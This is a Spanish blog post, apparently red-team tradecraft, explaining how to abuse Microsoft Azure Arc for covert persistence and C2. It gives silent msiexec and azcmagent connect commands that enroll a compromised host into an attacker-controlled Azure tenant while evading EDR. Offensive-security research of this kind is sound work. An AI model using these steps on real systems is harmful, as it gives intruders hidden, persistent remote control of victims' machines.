Este es un tema del que no vio mucha mención hasta el reciente blog de Andy Gill sobre el uso de Arc como mecanismo C2. Arc es genial porque es un producto legítimo de Microsoft y se comunica directamente con endpoints API conocidos dentro de Azure, lo que significa que normalmente pasa desapercibido por los productos de Detección y respuesta de endpoints (EDR). Aunque no recomiendo intentar operar a través de Arc, sirve como un mecanismo fuera de banda interesante para la persistencia de respaldo dentro de un entorno. Incluso si un host está unido de forma híbrida a un entorno de Entra, no es necesario que se conecte a una instancia de Arc alojada en el mismo inquilino. Realmente, lo que esto significa es que si tiene un contexto de alta integridad en un host que aún no está administrado a través de Arc, puede desplegar su propio cliente Arc y administrarlo a través de su propio inquilino de Azure.

Como el blog de Andy hace un gran trabajo al detallar el uso general de Arc para la persistencia, solo agregaré un pequeño punto para la operatividad cuando el acceso basado en GUI no sea posible (como lo que sería típico cuando se opera a través de un agente C2). Al revisar los comentarios de despliegue, el proceso de instalación del cliente de Arc consta en gran medida de dos partes: la instalación del cliente real a través de un instalador MSI y la conexión del cliente instalado a un inquilino de Azure a través de argumentos de línea de comandos pasados al Arc Connected Machine Agent (C:\ Program Files\AzureConnectedMachineAgent\azcmagent.exe). Ambos pasos de este proceso se pueden completar de forma local o remota (utilizando su vía de ejecución de código de movimiento lateral preferida) desde un contexto de línea de comandos no interactivo, utilizando la sintaxis aproximada de:

1.

msiexec /i C:\path\to\AzureConnectedMachineAgent.msi /l*v C:\path\to\write\installationlog.txt /qn REBOOT=ReallySuppress

2.

"C:\Program Files\AzureConnectedMachineAgent\azcmagent.exe" connect --service-principal-id "[Service Principal Application ID]" --service-principal-secret "[Your SP Secret]" --resource-group "[resource group]" --tenant-id "[your tenant ID]" --location "[Azure region you want client to be associated with]" --subscription-id "[your subscription]" --cloud "AzureCloud" --correlation-id "[pretty sure random GUID, can just grab from an actual script deployment]"

Una vez conectado, el sistema aparecerá dentro de la hoja de Arc en su inquilino de Azure, y podrá usar la CLI de az, la API de REST de az o la GUI para realizar acciones en él. Ahora que el cliente de Arc está conectado a un inquilino sobre el que tiene control total, también hay una gama más amplia de opciones disponibles para la ejecución posterior del código que se extiende más allá del alcance de lo que se ha cubierto en este blog.

Un punto adicional sobre el despliegue de Arc: desafortunadamente, no puede conectarse "por encima" de otra configuración de Arc sin desconectar primero la conexión de Arc existente, una operación que requiere el rol de Administrador de Recursos de Azure Connected Machine. Probablemente podría solucionar esto desinstalando completamente y luego reinstalando el cliente Arc, pero esa no sería mi primera opción para la ejecución o la persistencia. Realmente, lo que esto significa es que si un sistema ya tiene Arc instalado, debe enfocarse en obtener acceso a él a través de la conexión existente, en lugar de intentar configurar una conexión con su propio inquilino en él.